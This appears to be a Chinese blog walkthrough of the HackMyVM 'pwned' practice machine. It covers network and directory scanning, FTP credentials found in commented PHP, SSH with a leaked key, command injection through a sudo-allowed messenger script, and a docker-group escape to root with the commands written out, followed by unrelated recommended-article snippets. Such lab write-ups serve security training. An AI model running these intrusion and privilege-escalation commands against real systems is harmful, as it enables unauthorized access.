hackmyvm-pwned靶机

于 2024-11-17 01:50:27 发布
阅读量446 收藏 10
点赞数 6
分类专栏: hackmyvm靶场复现 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52710247/article/details/143826178
版权

主机发现

sudo arp-scan -l

 扫描并列出本地主机ip

发现主机ip: 192.168.71.169

nmap 192.168.71.169

 nmap扫描开放端口

22 ftp文件传输协议端口

22 ssh远程连接协议端口

80 web服务页面端口

 

查看web页面收集信息

查看页面元素,发现下面有一段提示信息

目录爆破

sudo gobuster dir -u http://192.168.71.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

爆破出来了两个目录

分别查看一下

 

 两个链接,第一个是返回到主页面了,第二个里面是一句话,提示信息

 

查看第二个目录

也是一个跳转链接

还有一个存放着一些目录,很像字典

敏感信息收集

打开看看

wget 下载这个目录下的字典到本地,在用字典跑一下目录,发现有一个敏感目录

 见名知意,发现可能是ftp的用户名和密码,登录上去看看

ftp登录信息

<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?>

 查看到有两个文件,全都get 下载到本地,id_rsa,应该是ssh的密钥

 查看note.txt 用户名应该是ariana,尝试一下,登录之前别忘了给chmod 600 id_rsa 加个权限

我已经提前加好了。 

ssh登录

ariana@pwned:~$ ls
ariana-personal.diary  user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana 

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

第一个user1 flag拿到了

提权

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

发现用selena 用户执行messenger.sh不用给权限

进入当前目录执行它

sudo -u selena ./messenger.sh 

Welcome to linux.messenger                                                                                                                   10:52:08 [0/0]
                                                                             
                                                                             
ariana:                                                                      
selena:                                                                      
ftpuser:                                                                     
                   
Enter username to send message : selena                          
                   
Enter message for selena :/bin/bash                                          
                   
Sending message to selena 
id                                                                           
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
pwd                                                                          
/home                                                                        
whoami                                                                       
selena        
python3 -c "import pty;pty.spawn('/bin/bash');"
selena@pwned:/home$ ls
ariana  ftpuser  messenger.sh  selena 
selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cd /root                                                                   
# cat root.txt                        
4d4098d64e163d2726959455d046fd7c                                             
                                      
                                                                             

You found me. i dont't expect this (◎ . ◎)
                                                                             
I am Ajay (Annlynn) i hacked your server left and this for you.              
                                                                             
I trapped Ariana and Selena to takeover your server :)
                                                                             

You Pwned the Pwned congratulations :) 

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker

 选择当前用户,执行bash ,拿到当前用户的shell,发现用户另一个属组是docker,先使用pyhon建立一个临时的shell再使用这个docker脚本反弹最终shell,切换根目录拿到root

pythonmath阶乘函数_Python--math
weixin_39831104的博客
11-23 4518
Python math 提供许多对浮点数的数学运算函数,math模块不支持复数运算,若需计算复数,可使用cmath模块(本文不赘述)。一 、查看math中包含的内容:使用dir函数,查看math中包含的所有内容:二、中所含的各个函数的含义:1、数字常数1) math.pi# 圆周率π2) math.e#自然对数底数3) math.inf #正无穷大∞,-math.in...
pythonmath阶乘函数_详解用python计算阶乘的几种方法
weixin_39974030的博客
11-23 4819
详解用python计算阶乘的几种方法第一种:利用functools 工具处理import functoolsresult = (lambda k: functools.reduce(int.__mul__, range(1, k + 1), 1))(5)print(result)第二种:普通的循环x = 1y = int(input("请输入要计算的数:"))for i in range(1, y...
int(sys.argv[1]) IndexError: list index out of range报错的原因
shursulei的博客
07-06 1万+
int(sys.argv[1]) IndexError: list index out of range 解决的方法是: 使用Terminal的方式打开终端: python xxx.py 4就可以 4为自己编写的数字
Pythonsys.argv[0]、sys.argv[1]分别代表什么
热门推荐
王员外的博客
11-29 5万+
1、本来想执行脚本的时候,传进来参数,利用sys模块就可以读取传进来的参数,我首先用的是sys.argv[0] import sys alu_path = sys.argv[0] 模块文件:install_app_v1.0_crush.py 2、脚本执行命令 python install_app_v1.0_crush.py 传进来的参数 3、修改为 sys.argv[1]解决问题,...
Python当中的命令行参数sys.argv[]的使用方法
极歌科技
03-04 769
首先,命令行参数的英语是commond line arguments,这个十分重要,如果考试考到连它的英语都不认识就麻烦大了。命令行参数这个函数的作用是用于接收程序外部的数据和字符串,这些数据和字符串则是在运行命令行的时候进行输入的。 如果是sys.argv[0],那么这个代表的则是这个程序的标题是什么,比如我们有一段程序,它的标题我已经更改为了sys.py,这样看起来运行起来都比较的方...
Python踩坑之 sys.argv[-1]代表什么
weixin_30439067的博客
03-28 2061
平台:win10+python 3.7.0 一、sys说明: sys.argv这个函数是我们写python脚本中最常用的一个函数. sysPython的一个「标准」,也就是官方出的「模块」,是「System」的简写,封装了一些系统的信息和接口。   官方的文档参考:https://docs.python.org/2/library/sys.html   中文版文档参考:http...
pythonmath阶乘函数_一行Python代码写阶乘函数
weixin_39992665的博客
11-23 296
背景我以前用Dart写过一行的阶乘函数:fact(double n) => n < 0 ? throw ('n must be bigger than 0') : n == 0 ? 1 : n * fact(n - 1);现在突(xián)发(zhe)奇(méi)想(shì),用Python写。貌似网上还没有这样的例子,所以我就发出来了。要求使用一行代码编写函数。调用方式为fact(x),其中x为...
pythonmath阶乘函数_Python lambda函数来计算一个数的阶乘
weixin_39996134的博客
11-23 681
有关于这个功能的两个硬盘部分这是一种混乱。1. lambda a, b: b*a(a, b-1) if b > 0 else 1。2. “B” 这是如下因素1.1,这不外乎:def f(a, b):if b > 0:b * a(a, b - 1)else:1对于2,本B(lambda b: (lambda a, b: a(a, b))(lambda a, b: b*a(a, b-1) if b ...
pythonmath阶乘函数_Python,的numpy模块中有没有 阶乘函数?
weixin_39917437的博客
11-23 658
展开全部有阶乘函2113数,Numpy中,mat必须是2维的5261,但是array可以是多维的(1D,2D,3D··4102··ND). Matrix是Array的一个1653小的分支,包含于Array。所以matrix 拥有array的所有特性。在numpy中matrix的主要优势是:相对简单的乘法运算符号。例如,a和b是两个matrices,那么a*b,就是矩阵积。若a=mat([1,2,3...
python 基础 python math的使用,展示了math中常用的函数并给出python2的示例
08-17
Python中的math是进行数学运算的核心模块,它提供了大量的数学函数,可以用于处理浮点数。这个Python 2和Python 3中都是可用的,但为了保持兼容性,这里我们将主要关注Python 2的示例。math的使用非常广泛,...
Python 082.递归函数_阶乘计算案例.mp4
02-08
Python 082.递归函数_阶乘计算案例.mp4
Math_in_Python:Python中的数学函数
04-05
Python中进行绘图通常会用到`matplotlib`,它可以绘制出各种复杂的图形,包括线图、散点图、直方图等。例如,`matplotlib.pyplot.plot()`可以用来绘制二维线图,`plt.scatter()`则用于绘制散点图。通过设置不同...
python怎么算阶乘_python计算阶乘
weixin_39737764的博客
11-25 4510
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元!问题本身很简单,主要是通过这个小问题来演示python的一些用法,例如测试代码运行时间、函数嵌套定义等等。 from time import timefrom math import factorialfrom functools importreducefrom random im...
2014年网络直报培训考试与答案医疗机构最终版.doc
05-31
2014年网络直报培训考试与答案医疗机构最终版.doc
SGMediation软件资源压缩包
06-01
"sgmediation.zip" 是一个包含 UCLA(加利福尼亚大学洛杉矶分校)开发的 sgmediation 插件的压缩包。该插件专为统计分析软件 Stata 设计,用于进行中介效应分析。在社会科学、心理学、市场营销等领域,中介效应分析是一种关键的统计方法,它帮助研究人员探究变量之间的因果关系,尤其是中间变量如何影响因变量与自变量之间的关系。Stata 是一款广泛使用的统计分析软件,具备众多命令和用户编写的程序来拓展其功能,sgmediation 插件便是其中之一。它能让用户在 Stata 中轻松开展中介效应分析,无需编写复杂代码。 下载并解压 "sgmediation.zip" 后,需将解压得到的 "sgmediation" 文件移至 Stata 的 ado 目录结构中。ado(ado 目录并非“adolescent data organization”缩写,而是 Stata 的自定义命令存放目录)目录是 Stata 存放自定义命令的地方,应将文件放置于 "ado\base\s" 子目录下。这样,Stata 启动时会自动加载该目录下的所有 ado 文件,使 "sgmediation" 命令在 Stata 命令行中可用。 使用 sgmediation 插件的步骤如下:1. 安装插件:将解压后的 "sgmediation" 文件放入 Stata 的 ado 目录。如果 Stata 安装路径是 C:\Program Files\Stata\ado\base,则需将文件复制到 C:\Program Files\Stata\ado\base\s。2. 启动 Stata:打开 Stata,确保软件已更新至最新版本,以便识别新添加的 ado 文件。3. 加载插件:启动 Stata 后,在命令行输入 ado update sgmediation,以确保插件已加载并更新至最新版本。4
Python蝉程序代码点击蝉时发出声音.txt
最新发布
06-01
Python蝉程序代码点击蝉时发出声音.txt
微信点餐系统 2025免费毕设附带论文 微信小程序+SpringBoot+Vue.js
06-01
2025免费毕设附带论文 微信小程序+SpringBoot+Vue.js 启动教程: https://www.bilibili.com/video/BV1BfB2YYEnS/?share_source=copy_web 讲解视频:https://www.bilibili.com/video/BV1BVKMeZEYr/?share_source=copy_web
基于ssm学科竞赛管理系统的设计与实现论文.doc
06-01
基于ssm学科竞赛管理系统的设计与实现论文
基于信息技术的施工项目管理.doc
06-01
基于信息技术的施工项目管理.doc
python中的阶乘函数
07-10
Python中,可以使用递归或循环来实现阶乘函数。下面是两种方式的示例代码: 1. 使用递归实现阶乘函数: ```python def factorial_recursive(n): if n == 0: return 1 else: return n * factorial_recursive...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值